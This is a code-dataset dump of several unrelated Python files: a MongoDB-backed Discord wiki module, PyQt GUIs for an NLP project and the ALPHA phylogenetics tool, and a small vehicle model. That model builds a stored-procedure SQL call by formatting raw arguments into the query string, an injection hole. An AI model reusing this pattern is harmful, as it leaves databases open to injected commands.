data['image'] = data['image'].replace('imag.cf', 'i.matdoes.dev')
if data.get('image') and isinstance(data.get('image'), str):
data['image'] = await images.get_data(data['image'])
elif data.get('image') and not data['image'].get('thumbnail_b64'):
data['image'] = await images.get_data(data['image']['src'])
if data != original_data:
await entries_coll.update_one({'_id': data['_id']}, {'$set': data})
data['content'] = utils.fix_html(data['content'])
if 'nohtml_content' not in data:
data['nohtml_content'] = utils.remove_html(data['content'])
return data
async def delete_entry(entry_data: DatabaseEntry, editor_id: int):
await discordbot.log_delete(entry_data, editor_id)
await entries_coll.delete_one({'_id': entry_data['_id']})
async def edit_entry(
title: str,
content: str,
editor_id: int,
unlisted: bool = False,
entry_id: str = None,
image: str = None
):
t = datetime.now()
title = title.strip()
await discordbot.log_edit(editor_id, title)
content = utils.fix_html(content)
nohtml_content = utils.remove_html(content)
new_data: PartialDatabaseEntry = {
'title': title,
'content': content,
'last_edited': t,
'nohtml_content': nohtml_content,
'unlisted': unlisted or False
}
if image is not None:
new_data['image'] = await images.get_data(image)
if not entry_id:
entry_id = str(uuid.uuid4())
new_history_data: DatabaseHistoryItem = {
'author': editor_id,
'content': content,
'title': title,
'time': t,
'unlisted': unlisted,
'image': None
}
if image is not None:
new_history_data['image'] = {
'src': image,
'thumbnail_b64': None,
'thumbnail_content_type': None
}
await entries_coll.update_one({'_id': entry_id}, {'$set': new_data, '$push': {'history': new_history_data}}, upsert=True)
return entry_id
async def get_entry(query: Optional[str] = None, entry_id: Optional[str] = None, search_id=True, owner=None) -> Union[DatabaseEntry, None]:
if not entry_id and query:
entries = await search_entries(query, limit=1, search_id=search_id)
if not entries:
return
return entries[0]
elif owner:
found = await entries_coll.find_one({'owner_id': owner})
else:
found = await entries_coll.find_one({'_id': entry_id})
found = await fix_entry(found)
return found
async def new_editor_session(discord_id):
sid = str(uuid.uuid4())
await sessions_coll.insert_one({'_id': sid, 'discord': discord_id, 'time': datetime.now()})
return sid
async def get_editor_session(sid):
if not hasattr(get_editor_session, 'cache'):
get_editor_session.cache = {}
if sid in get_editor_session.cache:
found = get_editor_session.cache[sid]
else:
found = await sessions_coll.find_one({'_id': sid})
get_editor_session.cache[sid] = found
if found is None:
return
return found['discord']
async def search_entries(query: str, limit=10, search_id=True, page=0, discord_id=None, unlisted=False) -> List[DatabaseEntry]:
found: List[DatabaseEntry] = []
match = {'$match': {'unlisted': {'$ne': True}}}
if unlisted:
match = {'$match': {'unlisted': {'$eq': True}}}
async for doc in entries_coll.aggregate([
{'$searchBeta': {'compound': {'should': [
{'search': {'query': query, 'path': 'nohtml_content'}},
{'search': {'query': query, 'path': 'title', 'score': {'boost': {'value': 20}}}},
]}}},
match,
{'$addFields': {'score': {'$meta': 'searchScore'}}},
{'$sort': {'score': -1}},
{'$skip': page * limit},
{'$limit': limit},
]):
fixed_entry = await fix_entry(doc)
if fixed_entry:
found.append(fixed_entry)
if len(found) == 0 and search_id:
found_entry = await get_entry(entry_id=query)
if found_entry:
found = [found_entry]
if len(found) == 0:
searched = await entries_coll.find_one({'title': query, 'unlisted': {'$ne': True}})
if searched:
found = [searched]
if len(found) == 0:
if query.startswith('<@') and query.endswith('>'):
entry_owner_id = query[2:-1]
if entry_owner_id[0] == '!':
entry_owner_id = entry_owner_id[1:]
entry_owner_id = int(entry_owner_id)
owned_entry = await entries_coll.find_one({'owner_id': entry_owner_id})
            if owned_entry:
found = [owned_entry]
return found
# Query is only if sort == relevant
async def get_entries(sort, limit=20, page=0, query=None, discord_id=None, unlisted=False):
# match = {'$match': {'unlisted': {'$ne': True}}}
# if discord_id is not None:
# if discord_id in ADMIN_IDS:
# match = {}
if sort == 'relevant' and query:
found = await search_entries(query, limit=limit, page=page, discord_id=discord_id, unlisted=unlisted)
return found
cursor = entries_coll.find({'unlisted': {'$ne': True}})
cursor = cursor.sort(sort, -1)
cursor = cursor.skip(page * limit)
cursor = cursor.limit(limit)
found = []
async for entry in cursor:
entry = await fix_entry(entry)
found.append(entry)
return found
async def set_personal_entry(discord_id, entry_id):
user_data = {
'personal_entry': entry_id,
}
await users_coll.update_one({'_id': discord_id}, {'$set': user_data}, upsert=True)
async for entry in entries_coll.find({'owner_id': discord_id}):
await entries_coll.update_one({'_id': entry['_id']}, {'$set': {'owner_id': None}})
await entries_coll.update_one({'_id': entry_id}, {'$set': {'owner_id': discord_id}})
try:
if hasattr(get_personal_entry, 'cache'):
get_personal_entry.cache[discord_id] = user_data
except Exception as e:
print('BRUH MOMENT', e)
async def get_personal_entry(discord_id):
if not hasattr(get_personal_entry, 'cache'):
get_personal_entry.cache = {}
if discord_id in get_personal_entry.cache:
found = get_personal_entry.cache[discord_id]
else:
found = await users_coll.find_one({'_id': discord_id})
get_personal_entry.cache[discord_id] = found
if found is None:
return
return found.get('personal_entry')
async def count_entries():
count = await entries_coll.count_documents({'unlisted': {'$ne': True}})
return count
async def get_random_entry():
cursor = entries_coll.aggregate([{'$match': {'unlisted': {'$ne': True}}}, {'$sample': {'size': 1}}])
found = []
async for entry in cursor:
found.append(entry)
return found[0]
async def get_featured_article():
return await config_coll.find_one({'name': 'featured'})
async def set_featured_article(entry_id):
featured = await config_coll.find_one({'name': 'featured'})
if featured:
await config_coll.replace_one({'name': 'featured'}, {'name': 'featured', 'value': entry_id})
else:
await config_coll.insert_one({'name': 'featured', 'value': entry_id})
async def disable_featured():
await config_coll.delete_one({'name': 'featured'})
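# Illustrative sketch (not part of the module; assumes a reachable MongoDB at
# `dburi` and a valid Discord editor id — the values below are placeholders).
# Shows the typical create-then-fetch flow using the coroutines defined above.
async def _example_flow():
    entry_id = await edit_entry(
        title='Example entry',
        content='<p>Hello world</p>',
        editor_id=123456789,
    )
    return await get_entry(entry_id=entry_id)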
|
StarcoderdataPython
|
9640478
|
<reponame>moamenibrahim/nlp-project
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from UI.qrangeslider import QRangeSlider
import main
import viewer
class mainWindow(QDialog):
"""This class will hold buttons and checkboxes
to specify parameters as inputs to the program
Arguments:
QDialog {[Class]} -- PyQt parent class
"""
def __init__(self, parent):
QDialog.__init__(self)
self.parent = parent
self.layout = QGridLayout()
self.rangeSlider = QRangeSlider()
self.rangeSlider.setRange(2001,2015)
self.rangeSlider.setMin(2001)
self.rangeSlider.setMax(2015)
self.TNE = QPushButton("Top Named Entities", self)
self.TNE.setCheckable(True)
self.TNE.setChecked(False)
self.TNE.setStatusTip("Runs Top Named entities algorithm")
self.SA = QPushButton("Sentiment Analysis", self)
self.SA.setCheckable(True)
self.SA.setChecked(False)
self.SA.setStatusTip("Runs Sentiment Analysis algorithm")
self.LDA = QPushButton("LDA", self)
self.LDA.setCheckable(True)
self.LDA.setChecked(False)
self.LDA.setStatusTip("Runs LDA algorithm")
self.TC = QPushButton("Top Co-occurences", self)
self.TC.setCheckable(True)
self.TC.setChecked(False)
self.TC.setStatusTip("Runs Top Co-occurences algorithm")
self.TD = QPushButton("Top Diseases", self)
self.TD.setCheckable(True)
self.TD.setChecked(False)
self.TD.setStatusTip("Runs Top Diseases algorithm")
self.executeBTN = QPushButton("Execute Selected")
self.executeBTN.clicked.connect(self.executeSelected)
self.executeBTN.setStatusTip("Executes Selected algorithms")
self.layout.addWidget(self.rangeSlider, 0, 0, Qt.AlignTop)
self.layout.addWidget(self.TNE, 1,0)
self.layout.addWidget(self.SA , 2, 0)
self.layout.addWidget(self.LDA , 3, 0)
self.layout.addWidget(self.TC , 4, 0)
self.layout.addWidget(self.TD , 5, 0)
self.layout.addWidget(self.executeBTN, 6, 0)
self.setLayout(self.layout)
def executeSelected(self):
rangeMin, rangeMax = self.rangeSlider.getRange()
print(rangeMin, " ", rangeMax)
self.dataAll = dict()
if(self.TNE.isChecked()):
self.executeTNE(rangeMin, rangeMax, self.dataAll)
if(self.SA.isChecked()):
self.executeSA(rangeMin, rangeMax, self.dataAll)
if(self.LDA.isChecked()):
self.executeLDA(rangeMin, rangeMax, self.dataAll)
if(self.TC.isChecked()):
self.executeTC(rangeMin, rangeMax, self.dataAll)
if(self.TD.isChecked()):
self.executeTD(rangeMin, rangeMax, self.dataAll)
# if (not len(self.dataAll)):
# return
# else:
# self.dataViewer = viewer.viewer(self)
# self.setCentralWidget(self.dataViewer)
# self.setWindowTitle("Results Viewer")
return
###########################################################################
def executeTNE(self, rangeMin, rangeMax, dataOutDict):
print("TNE activated")
## data should be a list of tuples, where each tuple is (string, int)
# data = main.histogramNER()
# dataOutDict['TNE'] = data
return
def executeSA(self, rangeMin, rangeMax, dataOutDict):
print("SA activated")
## data should be a list of tuples, where each tuple is (int, int)
# data = main.getSent()
# dataOutDict['SA'] = data
return
def executeLDA(self, rangeMin, rangeMax, dataOutDict):
print("LDA activated")
## data should be a string
# data = main.getTopic()
# dataOutDict['LDA'] = data
return
def executeTC(self, rangeMin, rangeMax, dataOutDict):
print("TC activated")
## data is a list of tuples, where each tuple is (string, int)
# data = main.mostCooccuring()
# dataOutDict['TC'] = data
return
def executeTD(self, rangeMin, rangeMax, dataOutDict):
## TODO
print("TD activated")
print("Future work: not yet designed.")
return
|
StarcoderdataPython
|
5122982
|
from app.model.Base import selectDB, insertBD
class Vehiculo():
@staticmethod
def listaVehiculos(idPersona):
data = selectDB("SELECT * FROM Vehiculo")
return recorrerResultados(data)
@staticmethod
def createVehiculo(marca, idPersona, idTipo):
query = "EXEC spCrearVehiculo @Marca = '{}', @IdPersona = {}, @IdTipo = {}".format(marca, idPersona, idTipo)
insertBD(query)
def recorrerResultados(data):
array = []
for row in data:
resultados = {}
resultados.update({"IdVehiculo": row["IdVehiculo"]})
resultados.update({"Marca": row["Marca"]})
resultados.update({"IdPersona": row["IdPersona"]})
resultados.update({"IdTipo": row["IdTipo"]})
array.append(resultados)
return array
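# Illustrative sketch (not part of the model; assumes the selectDB/insertBD
# helpers in app.model.Base are configured against a reachable database).
def _example():
    Vehiculo.createVehiculo(marca='Toyota', idPersona=1, idTipo=2)
    return Vehiculo.listaVehiculos(idPersona=1)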
|
StarcoderdataPython
|
12855686
|
<reponame>ShubhamAnandJain/MWP-CS229
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.module.Encoder import graph_based_encoder,rnn_encoder,transformer_encoder
|
StarcoderdataPython
|
1865395
|
# this module provides methods to search on various search engines and return parsed results
# later we may add a proxy pool to avoid search engine bans
# we may also use a boosting method to jointly use search results from different search engines
|
StarcoderdataPython
|
8002914
|
<filename>main.py
# utilities
import sip, sys, os, re, webbrowser
sip.setapi('QString', 2)
from PyQt4 import QtGui, QtCore
from functools import partial
# GUI
from raxmlOutputWindows import allTreesWindow, donutPlotWindow, scatterPlotWindow, pgtstWindow, robinsonFouldsWindow, heatMapWindow, bootstrapContractionWindow, dStatisticWindow, msRobinsonFouldsWindow, msPercentMatchingWindow, msTMRCAWindow, windowsToInfSitesWindow, lStatisticWindow
from module import gui_layout as gui
# logic
from module import RAxMLOperations as ro
from module import topologyPlots as tp
from module import statisticCalculations as sc
from module import fileConverterController as fc
from module import informativeSites as infSites
from module import bootstrapContraction as bc
from module import msComparison as ms
from module import plotter as p
from module import CalculateGeneralizedDStatisticClass as gd
from module import RunSW as sw
class PhyloVisApp(QtGui.QMainWindow, gui.Ui_PhylogeneticVisualization):
def __init__(self, parent=None):
super(PhyloVisApp, self).__init__(parent)
# remove any leftover files from previous raxml trials
badFileNames = ['RAxML_result', 'RAxML_randomTree', 'RAxML_log', 'RAxML_info', 'RAxML_bestTree', 'RAxML_bipartitions', 'RAxML_bipartitionsBranchLabels', 'RAxML_bootstrap']
for fileName in os.listdir('.'):
nameWithoutExtension = os.path.splitext(fileName)[0]
for file in badFileNames:
if nameWithoutExtension == file:
os.remove(fileName)
# if 'plots' folder doesn't exist -> create it
if not os.path.isdir('plots'):
os.mkdir('plots')
# remove all files in plots folder
for fileName in os.listdir('plots'):
os.remove('plots/' + fileName)
# initialize gui_layout
self.setupUi(self)
# set UI style -- options: u'Windows', u'Motif', u'CDE', u'Plastique', u'Cleanlooks', u'Macintosh (aqua)'
QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(u'Macintosh (aqua)'))
self.dStatisticTaxonComboBoxes = [self.dTaxonComboBox1, self.dTaxonComboBox2, self.dTaxonComboBox3, self.dTaxonComboBox4]
self.raxmlTaxonComboBoxes = [self.outgroupComboBox]
self.speciesTreeComboBoxes = [self.speciesTreeComboBox]
        # move the menu bar into the application window (only relevant on macOS)
self.menubar.setNativeMenuBar(False)
# set GUI icon
self.setWindowIcon(QtGui.QIcon('imgs/alphaLogo.png'))
# self.welcomeLogoImage.setScaledContents(True)
self.welcomeLogoImage.setPixmap(QtGui.QPixmap('imgs/alphaLogo.png'))
# create new instance of RaxmlOperations class
self.raxmlOperations = ro.RAxMLOperations()
# create new instance of TopologyPlotter class
self.topologyPlotter = tp.TopologyPlotter()
# create new instance of Statistics Calculations class
self.statisticsCalculations = sc.StatisticsCalculations()
# create new instance of Informative Sites class
self.informativeSites = infSites.InformativeSites()
# create new instance of BootstrapContraction class
self.bootstrapContraction = bc.BootstrapContraction()
# create new instance of MsComparison class
self.msComparison = ms.MsComparison()
# create new instance of FileConverter class
self.fileConverter = fc.FileConverter()
# create new instance of Plotter class
self.plotter = p.Plotter()
# create new instance of CalculateGeneralizedDStatisticClass class
self.calcGenD = gd.CalculateGeneralizedDStatisticClass()
# create new instance of RunSW class
self.calcSW = sw.RunSW()
self.topologyPlotter.num = None
# ADD NEW PAGE INFORMATION BELOW
# mapping from: windows --> page index
self.windows = {'welcomePage': 0, 'inputPageRax': 1, 'inputPageFileConverter': 2, 'inputPageMS': 3, 'inputPageDStatistic': 4, 'inputPageLStatistic': 5, 'inputPageSmoothWinds': 6}
# mapping from: windows --> dictionary of page dimensions
self.windowSizes = {'welcomePage': {'x': 459, 'y': 245}, 'inputPageRax': {'x': 700, 'y': 700}, 'inputPageFileConverter': {'x': 459, 'y': 403}, 'inputPageMS': {'x': 600, 'y': 746}, 'inputPageDStatistic': {'x': 600, 'y': 600}, 'inputPageLStatistic': {'x': 800, 'y': 900}, 'inputPageSmoothWinds': {'x': 759, 'y': 403}}
# mapping from: windows --> dictionary of page dimensions
self.windowLocations = {'welcomePage': {'x': 600, 'y': 300}, 'inputPageRax': {'x': 500, 'y': 175}, 'inputPageFileConverter': {'x': 600, 'y': 300}, 'inputPageMS': {'x': 520, 'y': 100}, 'inputPageDStatistic': {'x': 500, 'y': 175}, 'inputPageLStatistic': {'x': 450, 'y': 75}, 'inputPageSmoothWinds': {'x': 800, 'y': 300}}
# mapping from: mode --> page
self.comboboxModes_to_windowNames = {'RAx_ML': 'inputPageRax', 'File Converter': 'inputPageFileConverter', 'MS Comparison': 'inputPageMS', 'D Statistic': 'inputPageDStatistic', 'Generalized D Statistic': 'inputPageLStatistic', 'Smooth Winds': 'inputPageSmoothWinds'}
# mapping from: mode --> menu action
self.comboboxModes_to_actionModes = {'RAx_ML': self.actionRax, 'File Converter': self.actionConverter, 'MS Comparison': self.actionMS, 'D Statistic': self.actionDStatistic, 'Generalized D Statistic': self.actionLStatistic, 'Smooth Winds': self.actionSmooth_Winds}
# if users os is windows, use different sizes for each page
if sys.platform == 'win32':
self.windowSizes = {'welcomePage': {'x': 459, 'y': 245}, 'inputPageRax': {'x': 925, 'y': 688}, 'inputPageFileConverter': {'x': 630, 'y': 375}, 'inputPageMS': {'x': 675, 'y': 815}, 'inputPageDStatistic': {'x': 600, 'y': 570}, 'inputPageLStatistic': {'x': 600, 'y': 570}, 'inputPageSmoothWinds': {'x': 630, 'y': 375}}
# ADD NEW PAGE INFORMATION ABOVE
# set of previously generated RAxML Figures
self.prevGeneratedFigures = set()
# default values
self.runComplete = False
self.genDRunComplete = False
self.checkboxWeighted.setEnabled(False)
self.outgroupComboBox.setEnabled(False)
self.outgroupLabel.setEnabled(False)
self.bootstrapGroupBox.setEnabled(False)
self.outgroupGroupBox.setEnabled(False)
self.speciesTreeOutGroupGroupBox.setEnabled(False)
self.dStatisticLabel.setEnabled(False)
self.speciesTreeRaxmlCommandEntry.setEnabled(False)
self.customRaxmlCommandEntry.setEnabled(False)
self.progressBar.reset()
self.generateSpeciesTreeProgressBar.reset()
self.rooted = False
self.stackedWidget.setCurrentIndex(0)
self.raxmlToolBox.setCurrentIndex(0)
self.raxmlOptionsTabWidget.setCurrentIndex(0)
self.lOutputStacked.setCurrentIndex(0)
self.lAlignmentTypeStacked.setCurrentIndex(0)
self.resize(self.windowSizes['welcomePage']['x'], self.windowSizes['welcomePage']['y'])
self.outputFileConverterEntry.setText(os.getcwd())
self.heatmapPercentage.setText("100")
# open documentation
self.actionDocumentation.triggered.connect(lambda: self.openURL('https://github.com/chilleo/ALPHA'))
# only allow integers in the following fields
self.setValidator(self.windowSizeEntry, 'Int')
self.setValidator(self.windowOffsetEntry, 'Int')
self.setValidator(self.numberOfTopTopologiesEntry, 'Int')
self.setValidator(self.confidenceLevelEntry, 'Int')
self.setValidator(self.numberOfBootstrapsEntry, 'Int')
self.setValidator(self.msWindowSizeEntry, 'Int')
self.setValidator(self.msWindowOffsetEntry, 'Int')
self.setValidator(self.dWindowSizeEntry, 'Int')
self.setValidator(self.dWindowOffsetEntry, 'Int')
# **************************** CHANGE MODE ****************************#
# selecting a mode in the menu bar -> deselects all other modes first
# change the input mode based on which mode is selected in the menu bar
self.actionRax.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionRax, 'inputPageRax'))
self.actionConverter.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionConverter, 'inputPageFileConverter'))
self.actionMS.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionMS, 'inputPageMS'))
self.actionDStatistic.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionDStatistic, 'inputPageDStatistic'))
self.actionLStatistic.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionLStatistic, 'inputPageLStatistic'))
self.actionSmooth_Winds.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionSmooth_Winds, 'inputPageSmoothWinds'))
# triggers select file dialogs
self.inputFileBtn.clicked.connect(lambda: self.getFileName(self.inputFileEntry))
self.newickFileBtn.clicked.connect(lambda: self.getFileName(self.newickFileEntry))
# toggle what inputs are actionable based on checkboxes
self.checkboxRobinsonFoulds.clicked.connect(lambda: self.toggleEnabled(self.checkboxWeighted))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupComboBox))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupLabel))
self.checkboxBootstrap.stateChanged.connect(lambda: self.toggleEnabled(self.bootstrapGroupBox))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupGroupBox))
self.checkBoxCustomRaxml.stateChanged.connect(lambda: self.toggleEnabled(self.customRaxmlCommandEntry))
self.checkboxSpeciesTreeRooted.stateChanged.connect(lambda: self.toggleEnabled(self.speciesTreeOutGroupGroupBox))
self.checkboxSpeciesTreeUseCustomRax.stateChanged.connect(lambda: self.toggleEnabled(self.speciesTreeRaxmlCommandEntry))
        # enable / disable save location (save location is now always available, so these are commented out)
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileBtn))
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileEntry))
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileLabel))
# now these are enabled by default
self.lStatisticFileBtn.setEnabled(True)
self.lStatisticFileEntry.setEnabled(True)
self.lStatisticFileLabel.setEnabled(True)
#self.lStatistic.setText("Hi")
self.lStatisticFileCB.setChecked(True)
self.heatmapGenerate.clicked.connect(self.generateHeatmap)
self.generateFiguresBtn.clicked.connect(self.generateFigures)
# RAxML Events
self.connect(self.inputFileEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.raxmlTaxonComboBoxes, self.inputFileEntry))
self.connect(self.inputFileEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.speciesTreeComboBoxes, self.inputFileEntry))
self.connect(self.raxmlOperations, QtCore.SIGNAL('RAX_PER'), self.progressBar.setValue)
self.connect(self.raxmlOperations, QtCore.SIGNAL('RAX_COMPLETE'), self.raxmlComplete)
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_PER'), self.generateSpeciesTreeProgressBar.setValue)
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_COMPLETE'), partial(self.message, type='Err'))
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_COMPLETE_RETURN_ST'), self.speciesTreeEntry.setText)
self.connect(self.raxmlOperations, QtCore.SIGNAL('INVALID_ALIGNMENT_FILE'), lambda: self.message('Invalid File', 'Invalid alignment file. Please choose another.', 'Make sure your file has 4 sequences and is in the phylip-relaxed format.', type='Err'))
# run RAX_ML and generate graphs
self.runBtn.clicked.connect(self.runRAxML)
self.generateSpeciesTreeBtn.clicked.connect(self.generateSpeciesTree)
# **************************** WELCOME PAGE ****************************#
self.launchBtn.clicked.connect(self.initializeMode)
# **************************** CONVERTER PAGE ****************************#
self.fileTypeDocumentationBtn.clicked.connect(lambda: self.openURL('http://biopython.org/wiki/AlignIO'))
self.fileConverterBtn.clicked.connect(lambda: self.getFileName(self.fileConverterEntry))
self.outputFileConverterBtn.clicked.connect(lambda: self.openDirectory(self.outputFileConverterEntry))
self.runFileConverterBtn.clicked.connect(lambda: self.convertFile())
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_COMPLETE'), lambda: self.fileConverterProgressBar.setValue(100))
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_COMPLETE'), self.message)
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_ERR'), self.message)
# **************************** MS PAGE **************************** #
self.msCompareBtn.clicked.connect(self.runMSCompare)
self.msFileBtn.clicked.connect(lambda: self.getFileName(self.msFileEntry))
self.msSecondFileBtn.clicked.connect(lambda: self.getFileName(self.msSecondFileEntry))
self.connect(self.msComparison, QtCore.SIGNAL('MS_COMPLETE'), self.plotMSCompare)
self.connect(self.msComparison, QtCore.SIGNAL('MS_PER'), self.msProgressBar.setValue)
self.connect(self.msComparison, QtCore.SIGNAL('MS_ERR'), self.message)
self.checkboxCompareAgainstMS.clicked.connect(lambda: self.toggleEnabled(self.msMSCompareGroupBox))
self.checkboxCompareAgainstRaxml.clicked.connect(lambda: self.toggleEnabled(self.msRaxmlCompareGroupBox))
self.msRaxmlDirectoryBtn.clicked.connect(lambda: self.openDirectory(self.msRaxmlDirectoryEntry))
# dynamically add more file entries
self.msUploadAnother.clicked.connect(lambda: self.addFileEntry('msAdditionalFileHorizontalLayout', 'msAdditionalFileEntry', 'msAdditionalFileBtn', 'msRemoveFileBtn'))
# **************************** D STATISTIC PAGE **************************** #
# set background image
self.imagePixmap = QtGui.QPixmap('imgs/tree.png')
self.imageLabel.setScaledContents(True)
self.imageLabel.setPixmap(self.imagePixmap)
# select alignment for d statistic
self.dAlignmentBtn.clicked.connect(lambda: self.getFileName(self.dAlignmentEntry))
# when file entry text is changed
self.connect(self.dAlignmentEntry, QtCore.SIGNAL("FILE_SELECTED"), lambda: self.updateTaxonComboBoxes(self.dStatisticTaxonComboBoxes, self.dAlignmentEntry, require4Taxons=True))
# update progress bar
self.connect(self.statisticsCalculations, QtCore.SIGNAL('D_PER'), self.dProgressBar.setValue)
self.connect(self.statisticsCalculations, QtCore.SIGNAL('D_FINISHED'), self.displayDStatistic)
# run
self.dRunBtn.clicked.connect(self.runDStatistic)
self.connect(self.statisticsCalculations, QtCore.SIGNAL('INVALID_ALIGNMENT_FILE'), partial(self.message, type='Err'))
# **************************** L STATISTIC PAGE **************************** #
# set default L-statistic page to ask for password
#self.lStatisticStackedWidget.setCurrentIndex(0)
#self.lStatLoginBtn.clicked.connect(lambda: self.login(self.lStatPasswordLineEdit.text()))
#not asking for password any more, just set current index to 1
self.lStatisticStackedWidget.setCurrentIndex(1)
# list of combo boxes containing the taxa from the alignment for the L statistic
self.lStatisticSourceComboBoxes = [ self.reticulationSource0 ]
self.lStatisticTargetComboBoxes = [ self.reticulationTarget0 ]
self.additionalAlignmentEntries = [ self.lAlignmentEntry ]
# newick string for species tree
self.lSpeciesTree = ""
# select alignment and species tree for L statistic
self.lAlignmentBtn.clicked.connect(lambda: self.getFileName(self.lAlignmentEntry))
self.lAlignmentDirBtn.clicked.connect(lambda: self.openDirectory(self.lAlignmentDirEntry))
self.lSpeciesTreeBtn.clicked.connect(lambda: self.getFileName(self.lSpeciesTreeEntry))
self.lStatisticFileBtn.clicked.connect(lambda: self.getFileName(self.lStatisticFileEntry))
self.saveDirButton.clicked.connect(lambda: self.openDirectory(self.lStatSaveLocation))
self.calcGenD.plot = False
self.calcGenD.meta = ""
# when an alignment is selected update the combo boxes
self.connect(self.lAlignmentEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.lStatisticSourceComboBoxes, self.lAlignmentEntry))
self.connect(self.lAlignmentEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.lStatisticTargetComboBoxes, self.lAlignmentEntry))
# when an species tree is selected update the graph
self.connect(self.lSpeciesTreeEntry, QtCore.SIGNAL('FILE_SELECTED'), self.updateLTree)
# dynamically add more reticulations
self.lStatisticAddReticulationBtn.clicked.connect(self.addReticulationComboBox)
# dynamically add more file entries
self.lStatisticAddAlignmentBtn.clicked.connect(self.addAlignmentEntry)
# scroll all the way to the bottom every time you add an alignment or reticulation
self.connect(self.reticulationScrollArea.verticalScrollBar(), QtCore.SIGNAL("rangeChanged(int,int)"), lambda: self.reticulationScrollArea.verticalScrollBar().setValue(self.reticulationScrollArea.verticalScrollBar().maximum()))
self.connect(self.lAlignmentScrollArea.verticalScrollBar(), QtCore.SIGNAL("rangeChanged(int,int)"), lambda: self.lAlignmentScrollArea.verticalScrollBar().setValue(self.lAlignmentScrollArea.verticalScrollBar().maximum()))
self.runGenDStatBtn.clicked.connect(self.runGenD2)
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_COMPLETE'), self.genDComplete)
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_10'), lambda: self.lProgressBar.setValue(10))
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_50'), lambda: self.lProgressBar.setValue(50))
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_100'), lambda: self.lProgressBar.setValue(100))
self.viewVerboseOutputBtn.clicked.connect(lambda: self.lOutputStacked.setCurrentIndex(1))
self.viewRegularOutputBtn.clicked.connect(lambda: self.lOutputStacked.setCurrentIndex(0))
self.lUseDirCB.stateChanged.connect(lambda: self.lAlignmentTypeStacked.setCurrentIndex(1 if self.lUseDirCB.isChecked() else 0))
self.connect(self.calcGenD, QtCore.SIGNAL('L_FINISHED'), self.displayLStatistic)
self.connect(self.calcGenD, QtCore.SIGNAL('DGEN2_FINISHED'), self.displayDGEN2)
# **************************** SMOOTHWINDS PAGE **************************** #
# update progress bar
self.connect(self.calcSW, QtCore.SIGNAL('SW_UPDATE'), self.displaySW)
# button click
self.btnSmoothWinds.clicked.connect(self.runSW)
# **************************** WELCOME PAGE **************************** #
def initializeMode(self):
self.ensureSingleModeSelected(self.comboboxModes_to_actionModes[self.modeComboBox.currentText()], self.comboboxModes_to_windowNames[self.modeComboBox.currentText()])
# **************************** D STATISTIC PAGE **************************** #
def runDStatistic(self):
try:
            self.statisticsCalculations.dAlignment = self.checkEntryPopulated(self.dAlignmentEntry, errorTitle='Missing Alignment', errorMessage='Please select an alignment.')
self.statisticsCalculations.dWindowSize = self.checkEntryInRange(self.dWindowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.statisticsCalculations.dWindowOffset = self.checkEntryInRange(self.dWindowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.statisticsCalculations.taxons = [self.dTaxonComboBox1.currentText(), self.dTaxonComboBox2.currentText(), self.dTaxonComboBox3.currentText(), self.dTaxonComboBox4.currentText()]
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return
self.statisticsCalculations.start()
def displayDStatistic(self, dVal, dWindows):
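        """
        Stores the computed D value and the per-window D values, opens the D statistic
        plot window, and shows the overall D value in the GUI.
        """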
self.dVal = dVal
self.dWindows = dWindows
self.dStatisticWindow = dStatisticWindow.DStatisticWindow(self.dWindows)
self.dStatisticValueLabel.setText(str(self.dVal))
self.dStatisticLabel.setEnabled(True)
self.dStatisticValueLabel.setEnabled(True)
# **************************** L STATISTIC PAGE **************************** #
additionalReticulationCounter = 0
additionalAlignmentCounter = 0
def genDValidInput(self):
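        """
        Collects the generalized D statistic (DGEN) inputs from the GUI widgets and stores
        them on the calcGenD worker. Always returns True; per-field validation is assumed
        to happen in the Qt validators and in the downstream calculations.
        """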
self.calcGenD.r = self.getReticulations()
self.calcGenD.alignments = self.getAlignments()
self.calcGenD.window_size = int(self.lWindowSizeEntry.text().encode('utf-8'))
self.calcGenD.window_offset = int(self.lWindowOffsetEntry.text().encode('utf-8'))
self.calcGenD.verbose = True
self.calcGenD.alpha = 0.01
self.calcGenD.alpha = float(self.lAlphaEntry.text().encode('utf-8'))
self.calcGenD.save = True
self.calcGenD.useDir = self.lUseDirCB.isChecked()
self.calcGenD.directory = ""
self.calcGenD.o = self.lineEdit.text().encode('utf-8')
self.calcGenD.use_inv = self.checkBox.isChecked()
